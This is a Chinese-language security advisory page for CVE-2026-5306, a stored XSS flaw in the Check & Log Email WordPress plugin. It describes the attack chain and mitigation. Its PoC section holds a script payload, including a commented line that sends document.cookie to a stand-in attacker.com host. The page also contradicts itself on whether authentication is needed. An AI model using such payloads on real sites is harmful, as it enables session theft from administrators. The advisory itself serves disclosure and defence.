CVE-2026-5306 CVSS 5.4 中危

CVE-2026-5306 Check & Log Email插件存储型XSS漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5306

漏洞类型

存储型跨站脚本 (Stored XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Check & Log Email WordPress Plugin

漏洞概述

Check & Log Email WordPress插件在2.0.13之前的版本中存在存储型跨站脚本（XSS）漏洞。该漏洞源于插件未能正确处理邮件替换功能，特别是在启用邮件编码器设置时存在过滤缺陷。未经身份验证的攻击者可利用此缺陷注入恶意脚本，当管理员查看日志时触发攻击，进而窃取敏感数据或执行恶意操作。

技术细节

该漏洞的核心成因在于Check & Log Email插件在处理邮件替换逻辑时，未能对用户提交的邮件内容实施严格的过滤和转义机制。特别是在启用了邮件编码器设置的场景下，插件会对特定字段进行处理，但未考虑到恶意脚本注入的风险。攻击者无需经过身份验证，即可利用网站公开的表单接口（如评论、留言或联系表单）提交包含恶意JavaScript代码的数据。该数据被插件捕获并存储在数据库中作为邮件日志。当具有管理权限的用户登录WordPress后台并查看这些日志页面时，存储的恶意代码会被浏览器解析并执行。这种存储型XSS攻击允许攻击者在受害者的浏览器上下文中运行任意脚本，从而窃取会话Cookie、重定向到钓鱼网站，甚至利用管理员权限进一步控制服务器。虽然CVSS评分要求一定的用户交互（UI:R），但只要管理员查看日志即可触发，风险依然显著。

攻击链分析

STEP 1

侦察

攻击者确认目标网站使用了Check & Log Email WordPress插件，且版本低于2.0.13。

STEP 2

漏洞利用

攻击者通过网站前端的公开表单（如联系表单）提交数据，并在邮件内容字段中注入恶意JavaScript代码。

STEP 3

存储

插件记录该邮件请求，由于缺乏过滤，恶意载荷被原样存储在数据库的日志表中。

STEP 4

触发

网站管理员登录WordPress后台，访问Check & Log Email插件的日志查看页面。

STEP 5

执行

浏览器渲染日志页面时解析恶意脚本，攻击者的代码在管理员浏览器上下文中执行，窃取Cookie或进行恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-5306
Context: Email Replacement / Encoder setting enabled
Description: Injecting a script payload into an email field that gets logged.
-->

<script>
  // Simple payload to verify XSS execution
  alert('CVE-2026-5306: Stored XSS Executed');
  
  // Advanced payload: Steal session cookies (Proof of Concept)
  // var i = new Image();
  // i.src = "http://attacker.com/steal.php?c=" + document.cookie;
</script>

影响范围

Check & Log Email < 2.0.13

防御指南

临时缓解措施

建议立即升级插件至最新版本以修补漏洞。如果暂时无法升级，应禁用插件中的“邮件编码器”设置以降低风险，并加强对网站后台日志的监控，一旦发现异常访问立即排查。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表